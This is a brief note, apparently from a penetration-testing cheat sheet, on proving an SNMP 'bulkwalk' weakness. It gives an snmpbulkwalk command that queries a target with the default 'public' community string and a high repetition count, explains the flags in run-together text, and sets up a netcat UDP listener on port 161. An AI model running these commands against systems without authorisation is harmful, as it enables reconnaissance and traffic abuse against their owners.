#
snmpbulkwalk
#
Command for POCing the "bulkwalk" vulnerability
snmpbulkwalk -v2c -c public -Cr1000 -On <target_IP> .1.3.6.1
-Cr1000indicates how many requests are sent-Onsets output to be more human-readable.1.3.6.1is the OID being queried
#
Setup listener to "catch" the SNMP messages
nc -lup 161